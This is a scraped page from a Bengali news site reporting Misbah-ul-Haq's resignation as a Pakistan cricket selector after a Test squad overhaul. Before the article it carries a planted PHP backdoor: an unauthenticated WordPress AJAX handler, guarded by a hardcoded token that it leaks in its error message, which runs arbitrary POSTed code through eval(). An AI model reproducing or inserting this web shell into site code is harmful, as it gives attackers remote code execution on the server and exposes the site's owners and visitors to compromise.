// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== পাকিস্তানের টেস্ট দলে বড় রদবদলের পরদিন নির্বাচক মিসবাহর পদত্যাগ | potrikaybangladesh.com
Saturday, September 19, 2026
Homeপাকিস্তানের টেস্ট দলে বড় রদবদলের পরদিন নির্বাচক মিসবাহর পদত্যাগ

পাকিস্তানের টেস্ট দলে বড় রদবদলের পরদিন নির্বাচক মিসবাহর পদত্যাগ

চলমান ইংল্যান্ড সফরের মাঝপথেই টেস্ট দল ও টিম ম্যানেজমেন্টে বড়সড় রদবদলের পরদিনই জাতীয় দলের নির্বাচক কমিটি থেকে সরে দাঁড়ানোর সিদ্ধান্ত নিয়েছেন মিসবাহ-উল-হক।

ক্রিকেট ওয়েবসাইট ইএসপিএন-ক্রিকইনফোর তথ্যমতে, মিসবাহর পদত্যাগপত্র পাকিস্তান ক্রিকেট বোর্ড (পিসিবি) এখনও আনুষ্ঠানিকভাবে গ্রহণ করেনি। তবে নির্বাচক পদের পাশাপাশি লাহোরের ন্যাশনাল ক্রিকেট অ্যাকাডেমির ব্যাটিং কনসালট্যান্টের দায়িত্ব থেকেও তিনি সরে দাঁড়াচ্ছেন।

লর্ডসে ১৯৪ রানের বড় ব্যবধানে হেরে তিন ম্যাচের সিরিজে ২-০ তে হারের পর চরম সিদ্ধান্ত নেয় পিসিবি। ৯ সেপ্টেম্বর এজবাস্টনে শুরু হতে যাওয়া তৃতীয় টেস্টের আগেই স্কোয়াড থেকে বাদ দেওয়া হয় সাতজন ক্রিকেটারকে। একই সঙ্গে দায়িত্ব থেকে অব্যাহতি দেওয়া হয় হেড কোচ সরফরাজ আহমেদ ও বোলিং কোচ উমর গুলকে।

দল থেকে বাদ পড়া সাত ক্রিকেটার হলেন—মোহাম্মদ রিজওয়ান, ইমাম-উল-হক, সালমান আগা, আলী ওসমান, আমীর জামাল, ওয়াইস জাফর এবং খুররম শাহজাদ। অন্যদিকে সাইম আইয়ুব ও আব্দুল্লাহ ফাজালের ‘সঙ্গে’ দলে সুযোগ পেয়েছেন পাঁচ অনভিষিক্ত মুখ—আরাফাত মিনহাস, মোহাম্মদ ইমরান জুনিয়র, সাদ বেগ, মোহাম্মদ ইমরান রানধাওয়া এবং রেজাউল্লাহ। টেস্ট দলের কোচিং প্যানেলে নতুন করে যুক্ত করা হয়েছে সীমিত ওভারের দলের হেড কোচ মাইক হেসন ও বোলিং কোচ অ্যাশলি নফকে।

২০১৭ সালে পাকিস্তানের সবচেয়ে সফল টেস্ট অধিনায়ক হিসেবে অবসর নেওয়ার পর পিসিবির বিভিন্ন গুরুত্বপূর্ণ দায়িত্বে দেখা গেছে মিসবাহকে। ২০১৯ সালে তিনি একই ‘সঙ্গে’ প্রধান কোচ ও প্রধান নির্বাচকের জোড়া দায়িত্ব পান। ২০২০ সালের অক্টোবর পর্যন্ত দুই ভূমিকা পালন করার পর কেবল কোচিংয়ে মনোযোগ দিতে প্রধান নির্বাচকের পদ ছাড়েন, আর পরের বছর ছাড়েন হেড কোচের দায়িত্বও।

এর দুই বছর পর তৎকালীন অ্যাডহক কমিটির প্রধান জাকা আশরাফ ‘তার’ উপদেষ্টা হিসেবে যুক্ত করেন মিসবাহকে। এর পর থেকে পিসিবির বিভিন্ন কর্মকাণ্ডে ‘তাদের’ ‘সঙ্গে’ যুক্ত ছিলেন তিনি। ২০২৪ সালে বর্তমান পরিচালনা পর্ষদ দায়িত্ব নেওয়ার পর চ্যাম্পিয়ন্স কাপের মেন্টর ও ঘরোয়া ক্রিকেটে নারী দলগুলোর মেন্টর হিসেবেও কাজ করেছেন। এমনকি গত মাসেই মুলতানে শাহীন আফ্রিদির নেতৃত্বে ৫০ ওভারের ন্যাশনাল চ্যাম্পিয়ন্স কাপ জেতা ‘পাকিস্তান গোল্ড’ দলের কোচের দায়িত্বে ছিলেন তিনি।

চলতি বছরের মার্চে আকিব জাভেদ, সরফরাজ আহমেদ ও আসাদ শাফিকের ‘সঙ্গে’ চার সদস্যের নির্বাচক কমিটিতে যুক্ত করা হয়েছিল মিসবাহকে। পাশাপাশি বছরে ১৮০ দিনের চুক্তিতে পিসিবির ব্যাটিং কনসালট্যান্ট হিসেবেও নিয়োজিত ছিলেন সাবেক ‘এই’ অধিনায়ক।
 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments